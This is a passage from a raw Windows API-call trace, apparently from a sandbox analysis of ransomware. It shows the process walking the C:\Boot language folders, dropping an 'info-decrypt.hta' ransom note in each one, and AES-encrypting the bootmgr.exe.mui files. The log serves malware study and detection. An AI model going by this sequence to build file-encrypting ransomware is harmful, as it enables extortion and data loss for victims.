(hKey=0xb7f6d0, dwParam=0x1, pbData=0x3674e2c, dwFlags=0x0) returned 1 [0174.143] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c2e138*, pdwDataLen=0x6a7f188*=0x16260, dwBufLen=0x16260 | out: pbData=0x8c2e138*, pdwDataLen=0x6a7f188*=0x16260) returned 1 [0174.144] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3674e88*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x3674e88*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0174.146] CryptDestroyKey (hKey=0xb7fa10) returned 1 [0174.146] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0174.146] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0174.146] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0174.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0174.146] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0174.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0174.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0174.148] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0174.148] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\", lpFilePart=0x0) returned 0xe [0174.148] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa10 [0174.148] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.149] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.149] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0174.149] FindClose (in: hFindFile=0xb7fa10 | out: hFindFile=0xb7fa10) returned 1 [0174.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0174.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0174.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0174.149] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0174.149] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\", lpFilePart=0x0) returned 0xe [0174.149] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa10 [0174.149] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.150] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.150] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.150] FindClose (in: hFindFile=0xb7fa10 | out: hFindFile=0xb7fa10) returned 1 [0174.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0174.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0174.150] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0174.150] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0174.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0174.150] GetFileAttributesExW (in: lpFileName="C:\\Boot\\ja-JP\\info-decrypt.hta" (normalized: "c:\\boot\\ja-jp\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0174.150] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0174.150] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0174.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0174.150] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\info-decrypt.hta" (normalized: "c:\\boot\\ja-jp\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4a8 [0175.330] GetFileType (hFile=0x4a8) returned 0x1 [0175.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0175.331] GetFileType (hFile=0x4a8) returned 0x1 [0175.331] WriteFile (in: hFile=0x4a8, lpBuffer=0x36c6fdc*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x36c6fdc*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0176.205] WriteFile (in: hFile=0x4a8, lpBuffer=0x36c6fdc*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x36c6fdc*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0176.205] CloseHandle (hObject=0x4a8) returned 1 [0176.205] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0176.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0176.205] GetFileAttributesExW (in: lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x36c7ff8 | out: lpFileInformation=0x36c7ff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40)) returned 1 [0176.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0176.206] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0176.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0176.206] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0176.206] GetFileType (hFile=0x4a8) returned 0x1 [0176.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0176.206] GetFileType (hFile=0x4a8) returned 0x1 [0176.206] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x12a40 [0176.206] ReadFile (in: hFile=0x4a8, lpBuffer=0x3855ad4, nNumberOfBytesToRead=0x12a40, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x3855ad4*, lpNumberOfBytesRead=0x6a7f1bc*=0x12a40, lpOverlapped=0x0) returned 1 [0176.223] CloseHandle (hObject=0x4a8) returned 1 [0176.224] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66bab80) returned 1 [0176.225] CryptGenRandom (in: hProv=0x66bab80, dwLen=0x10, pbBuffer=0x3868868 | out: pbBuffer=0x3868868) returned 1 [0177.056] CryptImportKey (in: hProv=0x66bab80, pbData=0x3746dec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f290) returned 1 [0177.056] CryptContextAddRef (hProv=0x66bab80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0177.056] CryptContextAddRef (hProv=0x66bab80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0177.056] CryptDuplicateKey (in: hKey=0xb7f290, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f4d0) returned 1 [0177.056] CryptContextAddRef (hProv=0x66bab80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0177.056] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x4, pbData=0x3746ecc*=0x1, dwFlags=0x0) returned 1 [0177.056] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x1, pbData=0x3746e98, dwFlags=0x0) returned 1 [0177.056] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3746edc*, pdwDataLen=0x6a7f188*=0x12a50, dwBufLen=0x12a50 | out: pbData=0x3746edc*, pdwDataLen=0x6a7f188*=0x12a50) returned 1 [0177.057] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3759950*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x3759950*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0177.059] CryptDestroyKey (hKey=0xb7f290) returned 1 [0177.059] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0177.059] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0177.059] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0177.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0177.059] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0177.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0177.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0177.061] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0177.062] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\", lpFilePart=0x0) returned 0xe [0177.283] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f290 [0177.284] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.284] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0177.284] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.284] FindClose (in: hFindFile=0xb7f290 | out: hFindFile=0xb7f290) returned 1 [0177.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0177.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0177.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0177.285] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0177.285] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\", lpFilePart=0x0) returned 0xe [0177.285] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f290 [0177.285] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.286] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0177.286] FindNextFileW (in: hFindFile=0xb7f290, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0177.286] FindClose (in: hFindFile=0xb7f290 | out: hFindFile=0xb7f290) returned 1 [0177.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0177.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0177.286] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0177.286] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0177.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0177.286] GetFileAttributesExW (in: lpFileName="C:\\Boot\\ko-KR\\info-decrypt.hta" (normalized: "c:\\boot\\ko-kr\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0177.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0177.287] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0177.287] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0177.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0177.287] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\info-decrypt.hta" (normalized: "c:\\boot\\ko-kr\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x280 [0177.287] GetFileType (hFile=0x280) returned 0x1 [0177.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0177.287] GetFileType (hFile=0x280) returned 0x1 [0177.288] WriteFile (in: hFile=0x280, lpBuffer=0x37947d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x37947d8*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0177.289] WriteFile (in: hFile=0x280, lpBuffer=0x37947d8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x37947d8*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0177.289] CloseHandle (hObject=0x280) returned 1 [0177.289] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0177.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0177.290] GetFileAttributesExW (in: lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x37957f4 | out: lpFileInformation=0x37957f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650)) returned 1 [0177.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0177.290] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0177.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0177.290] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0177.290] GetFileType (hFile=0x280) returned 0x1 [0177.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0177.290] GetFileType (hFile=0x280) returned 0x1 [0177.290] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x12650 [0177.290] ReadFile (in: hFile=0x280, lpBuffer=0x379596c, nNumberOfBytesToRead=0x12650, 